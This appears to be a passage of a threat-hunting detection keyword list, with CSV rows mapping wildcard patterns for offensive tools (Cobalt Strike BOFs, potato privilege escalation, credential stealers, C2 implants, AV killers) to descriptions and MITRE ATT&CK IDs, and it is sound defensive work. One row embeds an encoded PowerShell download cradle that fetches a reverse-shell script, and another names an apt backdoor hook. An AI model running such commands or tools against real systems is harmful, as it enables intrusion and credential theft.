-*ansible2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*anthemtotheego/Detect-Hooks*,offensive_tool_keyword,cobaltstrike,Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/Detect-Hooks,1,1,N/A,10,10,138,28,2021-07-22T20:13:16Z,2021-07-22T18:58:23Z -*antirez/hping*,offensive_tool_keyword,hping,hping3 is a network tool able to send custom TCP/IP,T1046 - T1190 - T1200,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://github.com/antirez/hping,1,1,N/A,N/A,10,1296,326,2022-10-04T12:14:24Z,2012-06-13T17:41:54Z -*AntivirusBypass.psm1*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,1,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*antiword FUZZ*,offensive_tool_keyword,litefuzz,A multi-platform fuzzer for poking at userland binaries and servers,T1587.004,TA0009,N/A,N/A,Exploitation tools,https://github.com/sec-tools/litefuzz,1,0,N/A,N/A,1,54,7,2023-07-16T00:15:41Z,2021-09-17T14:40:07Z -*antonioCoco/ConPtyShell*,offensive_tool_keyword,ConPtyShell,ConPtyShell - Fully Interactive Reverse Shell for Windows,T1021 - T1071,TA0002,N/A,N/A,Exploitation tools,https://github.com/antonioCoco/ConPtyShell,1,1,N/A,N/A,9,817,150,2023-01-20T10:52:52Z,2019-09-13T22:11:18Z -*antonioCoco/JuicyPotatoNG*,offensive_tool_keyword,JuicyPotatoNG,Another Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/JuicyPotatoNG,1,1,N/A,10,8,703,90,2022-11-12T01:48:39Z,2022-09-21T17:08:35Z -*antonioCoco/RoguePotato*,offensive_tool_keyword,RoguePotato,Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/RoguePotato,1,1,N/A,10,9,876,125,2021-01-09T20:43:07Z,2020-05-10T17:38:28Z -*antonioCoco/RunasCs*,offensive_tool_keyword,RunasCs,RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential,T1055 - T1134.001,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs,1,1,N/A,N/A,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -*antonioCoco/RunasCs*,offensive_tool_keyword,RunasCs,RunasCs - Csharp and open version of windows builtin runas.exe,T1059.003 - T1059.001 - T1035,TA0002 - TA0004,N/A,N/A,Defense 
Evasion,https://github.com/antonioCoco/RunasCs/,1,1,N/A,6,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -*antonioCoco/SspiUacBypass*,offensive_tool_keyword,SspiUacBypass,Bypassing UAC with SSPI Datagram Contexts,T1548.002,TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/SspiUacBypass,1,1,N/A,10,2,167,27,2023-09-24T17:33:25Z,2023-09-14T20:59:22Z -*anydesk.exe --set-password*,greyware_tool_keyword,anydesk,setting the AnyDesk service password manually,N/A,N/A,N/A,N/A,RMM,https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/,1,0,N/A,5,10,N/A,N/A,N/A,N/A -*anypotato.exe*,offensive_tool_keyword,RasmanPotato,using RasMan service for privilege escalation,T1548.002 - T1055.002 - T1055.001 ,TA0004 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/crisprss/RasmanPotato,1,1,N/A,10,4,353,54,2023-02-06T10:27:41Z,2023-02-06T09:41:51Z -*aojlhgbkmkahabcmcpifbolnoichfeep*,greyware_tool_keyword,VirtualShield VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*AoratosWin*.zip*,offensive_tool_keyword,AoratosWin,AoratosWin A tool that removes traces of executed applications on Windows OS,T1070 - T1564,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/PinoyWH1Z/AoratosWin,1,1,N/A,N/A,2,117,18,2022-09-04T09:15:35Z,2022-09-04T09:04:35Z -*AoratosWin.csproj*,offensive_tool_keyword,AoratosWin,AoratosWin A tool that removes traces of executed applications on Windows OS,T1070 - T1564,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/PinoyWH1Z/AoratosWin,1,1,N/A,N/A,2,117,18,2022-09-04T09:15:35Z,2022-09-04T09:04:35Z -*AoratosWin.exe*,offensive_tool_keyword,AoratosWin,A tool that removes traces of executed 
applications on Windows OS.,T1070 - T1564,TA0005 - TA0011,N/A,N/A,Defense Evasion,https://github.com/PinoyWH1Z/AoratosWin,1,1,N/A,N/A,2,117,18,2022-09-04T09:15:35Z,2022-09-04T09:04:35Z -*AoratosWin.exe*,offensive_tool_keyword,AoratosWin,AoratosWin A tool that removes traces of executed applications on Windows OS,T1070 - T1564,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/PinoyWH1Z/AoratosWin,1,1,N/A,N/A,2,117,18,2022-09-04T09:15:35Z,2022-09-04T09:04:35Z -*AoratosWin.git*,offensive_tool_keyword,AoratosWin,AoratosWin A tool that removes traces of executed applications on Windows OS,T1070 - T1564,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/PinoyWH1Z/AoratosWin,1,1,N/A,N/A,2,117,18,2022-09-04T09:15:35Z,2022-09-04T09:04:35Z -*AoratosWin.sln*,offensive_tool_keyword,AoratosWin,AoratosWin A tool that removes traces of executed applications on Windows OS,T1070 - T1564,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/PinoyWH1Z/AoratosWin,1,1,N/A,N/A,2,117,18,2022-09-04T09:15:35Z,2022-09-04T09:04:35Z -*AoratosWin_*.zip*,offensive_tool_keyword,AoratosWin,A tool that removes traces of executed applications on Windows OS.,T1070 - T1564,TA0005 - TA0011,N/A,N/A,Defense Evasion,https://github.com/PinoyWH1Z/AoratosWin,1,1,N/A,N/A,2,117,18,2022-09-04T09:15:35Z,2022-09-04T09:04:35Z -*apache_felix_remote_shell*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*APC_Ijnect_Load.nim*,offensive_tool_keyword,C2 related tools,A shellcode loader written using nim,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/aeverj/NimShellCodeLoader,1,1,N/A,10,10,555,105,2023-08-26T12:48:08Z,2021-01-19T15:57:01Z -*apcfdffemoinopelidncddjbhkiblecc*,greyware_tool_keyword,Soul VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*apex2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*apfs_encrypted_volume_passwd.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. 
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*APIHookInjectorBin.exe*,offensive_tool_keyword,RDPCredentialStealer,RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++,T1555.001 - T1059.002 - T1552.002,TA0006 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/S12cybersecurity/RDPCredentialStealer,1,1,N/A,10,2,196,34,2023-06-14T10:25:33Z,2023-06-13T01:30:26Z -*APIHookInjectorBin.log*,offensive_tool_keyword,RDPCredentialStealer,RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++,T1555.001 - T1059.002 - T1552.002,TA0006 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/S12cybersecurity/RDPCredentialStealer,1,1,N/A,10,2,196,34,2023-06-14T10:25:33Z,2023-06-13T01:30:26Z -*APIHookInjectorBin.pdb*,offensive_tool_keyword,RDPCredentialStealer,RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++,T1555.001 - T1059.002 - T1552.002,TA0006 - TA0002 - TA0004,N/A,N/A,Credential 
Access,https://github.com/S12cybersecurity/RDPCredentialStealer,1,1,N/A,10,2,196,34,2023-06-14T10:25:33Z,2023-06-13T01:30:26Z -*APIHookInjectorBin.sln*,offensive_tool_keyword,RDPCredentialStealer,RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++,T1555.001 - T1059.002 - T1552.002,TA0006 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/S12cybersecurity/RDPCredentialStealer,1,1,N/A,10,2,196,34,2023-06-14T10:25:33Z,2023-06-13T01:30:26Z -*apokryptein/secinject*,offensive_tool_keyword,cobaltstrike,Section Mapping Process Injection (secinject): Cobalt Strike BOF,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/apokryptein/secinject,1,1,N/A,10,10,79,20,2022-01-07T21:09:32Z,2021-09-05T01:17:47Z -*apop2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z 
-*appdata*\Windows:svchost.exe*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,0,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*appdata*\Windows:winrm.vbs*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,0,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*AppData\Roaming\uTorrent*,greyware_tool_keyword,utorrent,popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. Not something we want to see installed in a enterprise network,T1193 - T1204 - T1486 - T1048,TA0005 - TA0011 - TA0010 - TA0040,N/A,N/A,Collection - Data Exfiltration,https[://]www[.]utorrent[.]com/intl/fr/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*applenotes2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*Applet_ReverseTCP.jar*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*Application.Lazagne.H*,offensive_tool_keyword,LaZagne,The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.,T1552 - T1003 - T1555,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagne,1,1,N/A,10,10,8527,1980,2023-08-12T12:38:22Z,2015-02-16T14:10:02Z -*applocker_enum*,offensive_tool_keyword,cobaltstrike,A Visual Studio template used to create Cobalt Strike BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/securifybv/Visual-Studio-BOF-template,1,1,N/A,10,10,210,46,2021-11-17T12:03:42Z,2021-11-13T13:44:01Z -*applocker-enumerator*,offensive_tool_keyword,cobaltstrike,A Visual Studio template used to create Cobalt Strike BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 
- T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/securifybv/Visual-Studio-BOF-template,1,1,N/A,10,10,210,46,2021-11-17T12:03:42Z,2021-11-13T13:44:01Z -*apt install crunch*,offensive_tool_keyword,crunch,Generate a dictionary file containing words with a minimum and maximum length,T1596 - T1596.001,TA0043,N/A,N/A,Credential Access,https://sourceforge.net/projects/crunch-wordlist/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*apt install gpp-decrypt*,offensive_tool_keyword,gpp-decrypt,Decrypt the given Group Policy Preferences,T1552.002 - T1212,TA0009 - TA0006,N/A,N/A,Credential Access,https://gitlab.com/kalilinux/packages/gpp-decrypt,1,0,N/A,6,10,N/A,N/A,N/A,N/A -*apt install hyperion*,offensive_tool_keyword,hyperion,A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. 
The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds),T1027.002 - T1059.001 - T1116,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://www.kali.org/tools/hyperion/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*apt install polenum*,offensive_tool_keyword,polenum,Uses Impacket Library to get the password policy from a windows machine,T1012 - T1596,TA0009 - TA0007,N/A,N/A,Discovery,https://salsa.debian.org/pkg-security-team/polenum,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*apt install set -y*,offensive_tool_keyword,social-engineer-toolkit,The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec,T1566 - T1598,TA0001 - TA0002 - TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/trustedsec/social-engineer-toolkit,1,0,N/A,N/A,10,9394,2569,2023-08-25T17:25:45Z,2012-12-31T22:01:33Z -*apt install wce*,offensive_tool_keyword,wce,Windows Credentials Editor,T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001,TA0006 - TA0005 - TA0002,N/A,N/A,Credential Access,https://www.kali.org/tools/wce/,1,0,N/A,8,4,N/A,N/A,N/A,N/A -*APT stands for Advanced Persistence Tomato*,offensive_tool_keyword,D1rkInject,Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state,T1055 - T1055.012 - T1055.002 - T1574.002,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/D1rkInject,1,0,N/A,9,2,129,24,2023-08-02T02:45:46Z,2023-08-02T02:13:55Z -*apt* install john*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*apt/etumbot.py*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test 
egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*apt/putterpanda.py*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*APT::Update::Pre-Invoke *}*,greyware_tool_keyword,APT,linux commands abused by attackers - backdoor apt execute a command when invoking apt,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Exploitation tools,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*apt1_virtuallythere.profile*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*APT64/EternalHushFramework*,offensive_tool_keyword,EternalHushFramework,EternalHush Framework is a new open source project that is an advanced C&C framework. 
Designed specifically for Windows operating systems,T1071.001 - T1132.001 - T1059.003 - T1547.001,TA0011 - TA0005 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/APT64/EternalHushFramework,1,1,N/A,10,10,140,21,2023-09-21T19:04:41Z,2023-07-09T09:13:21Z -*apt-get -y install tor *,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://github.com/samsesh/SocialBox-Termux,1,0,N/A,7,10,2417,268,2023-07-14T10:59:10Z,2019-03-28T18:07:05Z -*APTortellini/unDefender*,offensive_tool_keyword,unDefender,Killing your preferred antimalware by abusing native symbolic links and NT paths.,T1562.001 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/APTortellini/unDefender,1,1,N/A,10,4,309,78,2022-01-29T12:35:31Z,2021-08-21T14:45:39Z -*APTSimulator*,offensive_tool_keyword,APTSimulator,APT Simulator is a Windows Batch script that uses a set of tools and output files to make a system look as if it was compromised. In contrast to other adversary simulation tools. APT Simulator is deisgned to make the application as simple as possible. You don't need to run a web server. database or any agents on set of virtual machines. Just download the prepared archive. extract and run the contained Batch file as Administrator. 
Running APT Simulator takes less than a minute of your time.,T1036 - T1059 - T1562 - T1027 - T1003,TA0001 - TA0008 - TA0002,N/A,N/A,Exploitation tools,https://github.com/NextronSystems/APTSimulator,1,1,N/A,N/A,10,2272,414,2023-06-16T08:48:25Z,2018-02-03T14:19:42Z -*apypykatz.py*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*aQBlAHgAIAAoAE4AZwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgAvAHIAZQB2AC4AcABzADEAJwApAA*,offensive_tool_keyword,JustEvadeBro,JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.,T1562.001 - T1055.012 - T1218.011,TA0005 - TA0040 - TA0010,N/A,N/A,Defense Evasion,https://github.com/sinfulz/JustEvadeBro,1,0,N/A,8,3,260,25,2023-03-30T06:22:24Z,2021-05-11T06:26:10Z -*aquatone*,offensive_tool_keyword,aquatone,Aquatone is a tool for visual inspection of websites across a large amount of hosts and is convenient for quickly gaining an overview of HTTP-based attack surface.,T1590 - T1553 - T1002 - T1083 - T1313,TA0009 - TA0002 - TA0007,N/A,N/A,Web Attacks,https://github.com/michenriksen/aquatone,1,0,N/A,N/A,10,5265,876,2022-05-22T19:49:32Z,2015-11-19T11:30:12Z -*archerysec*,offensive_tool_keyword,archerysec,Archery is an opensource vulnerability assessment and management tool which helps developers and pentesters to perform scans and manage vulnerabilities. Archery uses popular opensource tools to perform comprehensive scanning for web application and network. It also performs web application dynamic authenticated scanning and covers the whole applications by using selenium. 
The developers can also utilize the tool for implementation of their DevOps CI/CD environment.,T1190 - T1082 - T1518,TA0003 - TA0008,N/A,N/A,Frameworks,https://github.com/archerysec/archerysec,1,0,N/A,N/A,10,2135,507,2023-09-26T14:45:31Z,2017-12-04T12:42:54Z -*archive-*.kali.org/*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*ArchStrike*,offensive_tool_keyword,archstrike,Arch Linux repo containing lots of exploitation tools for pentesters,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://archstrike.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*ares.py runserver*,offensive_tool_keyword,Ares,Python C2 botnet and backdoor ,T1105 - T1102 - T1055,TA0003 - TA0002 - TA0007,N/A,N/A,C2,https://github.com/sweetsoftware/Ares,1,0,N/A,10,10,1439,523,2023-03-02T12:43:09Z,2015-10-18T12:26:27Z -*ares-master.zip*,offensive_tool_keyword,Ares,Python C2 botnet and backdoor ,T1105 - T1102 - T1055,TA0003 - TA0002 - TA0007,N/A,N/A,C2,https://github.com/sweetsoftware/Ares,1,1,N/A,10,10,1439,523,2023-03-02T12:43:09Z,2015-10-18T12:26:27Z -*Args_Invoke_Kerberoast*,offensive_tool_keyword,SharpView,C# implementation of 